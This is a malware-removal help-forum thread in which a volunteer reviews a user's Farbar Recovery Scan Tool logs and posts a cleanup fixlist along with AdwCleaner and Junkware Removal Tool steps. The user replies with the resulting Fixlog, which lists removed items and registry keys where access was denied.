 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 08:25 - 2015-12-23 08:50 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\MuhammadAkim\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\toshiba_wallpaper_sailboats.jpg
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\abang\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Control Panel\Desktop\\Wallpaper -> C:\Users\sesay\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img13.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_F360403BC2EC98CA32D7EC0F47FB7B5E"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\StartupApproved\Run: => "Gameo"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{313A0B34-8446-4C12-A65F-E4B0878B3235}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{77296244-CD34-4559-83EE-EAF023F89DB5}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8444577F-8F21-4326-A3E3-C3F4D0CCBABC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0BBAD64B-1E94-416A-9BC4-7D136E7A5FBC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{CFBBD29C-D004-4467-AA8C-5254574A481F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{9A26AF2C-2797-405D-AE05-942BE2142FAF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{9710FDC8-445E-41EC-83F9-59B349E510F7}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{EBA377C4-E001-4E22-9B23-0005D0B6D4F1}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{774D11D4-2F23-42DD-8F1C-C8D26029B90E}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{3DEFAA54-29A0-4529-9E02-EA157C6A4C90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C74CE9D2-5C23-42CF-9E28-309435A41C2A}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{ED088A7F-9EF0-45C6-A947-DCC29B27A1D1}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{73989EB3-9188-44D6-AEB0-CEF36E0D1014}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{F221BDBB-11A8-487A-8042-27768BD2DCB7}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{E82A5B6E-A2ED-4BF4-9592-C73440B3BA2F}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{0E9662D1-C856-4828-AC71-803929B44E3B}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{2CF0B8ED-39FA-4421-80B2-9A9F59723926}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{15F1EB6F-7897-4484-8C47-101BA1EBC48A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{F149568A-26C5-41F5-8550-C65471395703}] => (Allow) C:\Users\MuhammadAkim\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{5ACCE7A0-6EBD-4E40-9629-FEC93838A9D0}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{B09D31F1-FAD1-45C5-86F9-18539C6ABE4E}] => (Allow) LPort=2869
FirewallRules: [{5EE686D7-EA54-4E8B-BE97-18656F50F071}] => (Allow) LPort=1900
FirewallRules: [{63EFD60D-7453-4540-AAF7-EBD87C4CBF4D}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{214F2750-1440-4ADB-A6B3-3745D9641CAF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trove\GlyphClient.exe
FirewallRules: [{359C58EA-A374-44A4-AD09-48056680F92B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trove\GlyphClient.exe
FirewallRules: [{EDA71C7F-C96A-4826-8E61-0B6AE60B10CE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe
FirewallRules: [{3811993D-AF72-4E9D-A3E6-43CF26C67BD6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe
FirewallRules: [{4A8101BD-B232-4A48-BFFB-BEAF490E04A7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
21-01-2016 15:32:30 Scheduled Checkpoint
25-01-2016 17:18:07 Kinect for Windows SDK v2.0_1409
30-01-2016 20:47:19 Windows Update
 
==================== Faulty Device Manager Devices =============
 
Name: Officejet 4500 G510n-z
Description: Officejet 4500 G510n-z
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/31/2016 07:33:45 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 07:27:15 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 06:51:31 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 06:21:25 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 05:47:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 05:06:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 04:45:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 02:44:10 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App failed with error: -2147024770 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 02:36:51 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App failed with error: -2147024770 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 02:33:40 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073422302
 
 
System errors:
=============
Error: (01/31/2016 07:57:16 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:50:38 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:43:50 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:37:13 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:33:45 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivationCortanaUI.AppXn73w0hsq3g4wx1h9fhf7q02vw2wta6qc.mcaUnavailableBasement-pcsesayS-1-5-21-1436452318-2580999886-2786755032-1003LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:30:47 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:27:15 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivationCortanaUI.AppXn73w0hsq3g4wx1h9fhf7q02vw2wta6qc.mcaUnavailableBasement-pcsesayS-1-5-21-1436452318-2580999886-2786755032-1003LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:24:56 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:18:55 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:13:44 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
 
CodeIntegrity:
===================================
  Date: 2016-01-29 16:59:04.910
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-15 21:53:53.600
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-14 08:38:24.870
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-10 22:59:22.198
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-10 15:05:37.248
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-30 10:14:59.529
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-26 12:19:01.409
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-24 18:54:58.990
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-20 03:34:44.397
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-15 21:24:22.269
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i3-4160T CPU @ 3.10GHz
Percentage of memory in use: 49%
Total physical RAM: 8117.75 MB
Available physical RAM: 4098.66 MB
Total Virtual: 10805.75 MB
Available Virtual: 5892.49 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:910.99 GB) (Free:844.58 GB) NTFS
Drive d: (Recovery Image) (Fixed) (Total:18.61 GB) (Free:2.33 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 09151085)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 




#6 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 31 January 2016 - 09:03 PM

Thanks for the information. I am not sure this is a malware issue but we will poke around a bit.

Does this only happen when gaming?

Please do this.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

AdwCleaner by Xplode - Delete Adware

-------------------
  • Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed you will see Pending. Please check elements you don't want to remove above the progress bar
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Your computer will be rebooted automatically. A text file will open after the restart
  • Copy and paste the contents in your reply
  • You can also find the logfile at C:\AdwCleaner\AdwCleaner.txt
===================================================

Junkware Removal Tool

-------------------
  • Please download Junkware Removal Tool and save it to your desktop.
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Please allow the program time to run
  • Once completed a Notepad document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • AdwCleaner log
  • Junkware log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#7 Alban18


Posted 31 January 2016 - 10:11 PM

Yeah that's what I figured when he explained the problem to me.

I didn't think it was a malware issue. Rather I think it's a problem with the software.

I will do these tasks tomorrow. 



#8 Oh My!


Posted 31 January 2016 - 10:18 PM

:thumbsup2:
Gary
 

#9 Alban18


Posted 02 February 2016 - 07:35 PM

I saved my jrt.txt log on my desktop but I couldn't find it. I don't know what happened to it.

I copied and pasted the other 2 content files.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by sesay (2016-02-02 18:41:37) Run:2
Running from C:\Users\sesay\Desktop
Loaded Profiles: sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
*****************
 
Error: (0) Failed to create a restore point.
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key could not remove. Access Denied.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found. 
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe => not found.
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key could not remove. Access Denied.
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C31380-2799-493E-A3C0-05D5EE7729AC} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key could not remove. Access Denied.
Could not move "C:\WINDOWS\System32\Tasks\gameo_update" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key could not remove. Access Denied.
C:\Users\sesay\AppData\Roaming\Gameo => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4} => key could not remove. Access Denied.
C:\WINDOWS\System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => key could not remove. Access Denied.
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by sesay (2016-02-02 18:41:37) Run:2
Running from C:\Users\sesay\Desktop
Loaded Profiles: sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
